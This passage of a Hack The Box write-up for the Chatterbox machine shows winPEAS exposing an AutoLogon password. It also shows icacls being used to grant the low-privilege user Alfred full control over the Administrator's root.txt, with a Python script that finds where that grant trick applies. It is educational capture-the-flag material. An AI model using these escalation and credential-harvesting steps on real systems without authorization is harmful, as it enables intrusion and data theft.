11. Run winPEAS and look for anything usable (the x86 build, since systeminfo reports an X86-based PC)

C:\Users\Alfred\Desktop>winPEASx86.exe
winPEASx86.exe
......
Home folders found
C:\Users\Administrator : Alfred [AllAccess]
C:\Users\Alfred : Alfred [AllAccess]
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\Public : Interactive [WriteData/CreateFiles]
......
Some AutoLogon credentials were found
DefaultUserName : Alfred
DefaultPassword : Welcome1!
......

12. I missed this on my first pass through the enumeration output and only noticed it after reading other writeups: Alfred has AllAccess on C:\Users\Administrator, the Administrator's profile directory. winPEAS also turns up an AutoLogon password for Alfred (Welcome1!).

13. Because we hold rights on that directory, a small trick applies:

icacls "C:/Users/Administrator/Desktop/root.txt" /grant Alfred:F

icacls prints only the DACL, and the DACL on root.txt (confirmed with cacls below) lists Administrator alone, so Alfred cannot read it directly. Changing a DACL requires WRITE_DAC, which Full control (F) includes and which the object's owner always holds whatever the DACL says; that is what makes the /grant above succeed and lets Alfred add an entry for himself. Before relying on this elsewhere, check the owner with dir /q, since icacls does not show it.

14. First check the file's current permissions, then add the access entry. The two type failures below are not access denials: cmd's built-in type treats the forward slashes in the path as switches, hence "The syntax of the command is incorrect", while icacls, an external program, accepts them.

C:\Users\Alfred\Desktop>type C:/Users/Administrator/Desktop/root.txt
type C:/Users/Administrator/Desktop/root.txt
The syntax of the command is incorrect.

C:\Users\Alfred\Desktop>icacls "C:/Users/Administrator/Desktop/root.txt"
icacls "C:/Users/Administrator/Desktop/root.txt"
C:/Users/Administrator/Desktop/root.txt CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users\Alfred\Desktop>icacls "C:/Users/Administrator/Desktop/root.txt" /grant Alfred:F
icacls "C:/Users/Administrator/Desktop/root.txt" /grant Alfred:F
processed file: C:/Users/Administrator/Desktop/root.txt
Successfully processed 1 files; Failed processing 0 files

C:\Users\Alfred\Desktop>type C:/Users/Administrator/Desktop/root.txt
type C:/Users/Administrator/Desktop/root.txt
The syntax of the command is incorrect.

C:\Users\Alfred\Desktop>icacls "C:/Users/Administrator/Desktop/root.txt"
icacls "C:/Users/Administrator/Desktop/root.txt"
C:/Users/Administrator/Desktop/root.txt CHATTERBOX\Alfred:(F)
CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users\Alfred\Desktop>

15. We now have full control over the file. The older cacls shows the same DACL in compact form; change into the directory, so that type gets a plain filename, and read the flag:

Further reading: https://blog.csdn.net/MagicalProgrammer/article/details/115716711

C:\Users\Alfred\Desktop>cacls C:/Users/Administrator/Desktop/root.txt
cacls C:/Users/Administrator/Desktop/root.txt
C:\Users\Administrator\Desktop\root.txt CHATTERBOX\Alfred:F
CHATTERBOX\Administrator:F


C:\Users\Alfred\Desktop>cd C:/Users/Administrator/Desktop/
cd C:/Users/Administrator/Desktop/

C:\Users\Administrator\Desktop>type root.txt
type root.txt
285086080585f43b6d7a060251f955b9

C:\Users\Administrator\Desktop>
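winPEAS summarised the home-folder ACLs as "Alfred [AllAccess]"; when checking by hand with icacls C:\Users\* the same information is spread over one line per ACE. The added example below (my code, not the writeup's) parses that layout, using the fact that icacls aligns every follow-up ACE under the first one (indent equals path length plus one), and flags paths inside another user's profile where a given account holds a right that modifies data or the DACL. The directory block in the sample is constructed to match what winPEAS reported; the root.txt line is the page's own.

```python
"""Parse icacls output and flag ACEs that let a given account modify objects
inside another user's profile. Added example, not part of the writeup."""
import re

INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}
WRITE_RIGHTS = {"F", "M", "W", "D", "WDAC", "WO"}  # rights that change content or the ACL
ACE_RE = re.compile(r"^(?P<who>[^:]+?):(?P<parens>(?:\([^()]*\))+)$")

# Constructed sample in icacls' layout. The directory block is invented to
# match the "Alfred [AllAccess]" winPEAS reported; the root.txt line is the
# page's own. icacls aligns every follow-up ACE under the first one.
_DIR = r"C:\Users\Administrator"
_PAD = " " * (len(_DIR) + 1)
SAMPLE = "\n".join([
    _DIR + r" CHATTERBOX\Alfred:(OI)(CI)(F)",
    _PAD + r"NT AUTHORITY\SYSTEM:(OI)(CI)(F)",
    _PAD + r"BUILTIN\Administrators:(OI)(CI)(F)",
    _PAD + r"CHATTERBOX\Administrator:(OI)(CI)(F)",
    "",
    r"C:\Users\Administrator\Desktop\root.txt CHATTERBOX\Administrator:(F)",
    "",
    "Successfully processed 2 files; Failed processing 0 files",
])


def _split_ace(ace):
    """'CHATTERBOX\\Alfred:(OI)(CI)(F)' -> (principal, inherit flags, rights)."""
    m = ACE_RE.match(ace.strip())
    if not m:
        raise ValueError("not an icacls ACE: %r" % ace)
    tokens = re.findall(r"\(([^()]*)\)", m.group("parens"))
    flags = frozenset(t for t in tokens if t in INHERIT_FLAGS)
    rights = frozenset(r for t in tokens if t not in INHERIT_FLAGS for r in t.split(","))
    return m.group("who"), flags, rights


def parse_icacls(text):
    """Return {path: [(principal, inherit_flags, rights), ...]}."""
    blocks, current = [], []
    for line in text.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            if current:
                blocks.append(current)
                current = []
            continue
        current.append(line)
    if current:
        blocks.append(current)
    acl = {}
    for first, *rest in blocks:
        if rest:
            # Follow-up ACEs are indented by len(path)+1, which recovers the
            # path even when it or a principal contains spaces.
            indent = len(rest[0]) - len(rest[0].lstrip(" "))
            path, first_ace = first[:indent - 1], first[indent:]
        else:
            # Single-ACE object: split at the last space. Correct for paths
            # like the ones here; a principal such as NT AUTHORITY\SYSTEM on a
            # single-ACE line would need the object name passed in instead.
            path, first_ace = first.rsplit(" ", 1)
        acl[path] = [_split_ace(first_ace)] + [_split_ace(r) for r in rest]
    return acl


def profile_owner(path):
    """Account whose profile contains the path, or None outside C:\\Users."""
    m = re.match(r"(?i)^[a-z]:\\users\\([^\\]+)", path)
    return m.group(1).lower() if m else None


def foreign_profile_writes(acl, account):
    """Paths inside someone else's profile where `account` can modify data or
    the DACL; each hit is (path, principal as printed, sorted rights)."""
    account = account.lower()
    short = account.split("\\")[-1]
    hits = []
    for path, aces in acl.items():
        owner = profile_owner(path)
        if owner is None or owner == short:
            continue
        for who, _flags, rights in aces:
            if who.lower() == account and rights & WRITE_RIGHTS:
                hits.append((path, who, sorted(rights)))
    return hits


if __name__ == "__main__":
    for hit in foreign_profile_writes(parse_icacls(SAMPLE), r"CHATTERBOX\Alfred"):
        print(hit)
```

Feed it the saved output of icacls C:\Users\* /t and the hit list is the set of places where the grant trick from step 13 is worth trying; the single-ACE fallback is the one place the parser guesses, so pass a known path when checking one object.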

16. I tried many approaches on this box thinking I could get an Administrator reverse shell, but could not, and the other writeups I read afterwards did not get one either.

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/123


https://sh1yan.top/2024/03/28/Chatterbox-htb-writeup/
Author: shiyan
Published: 28 March 2024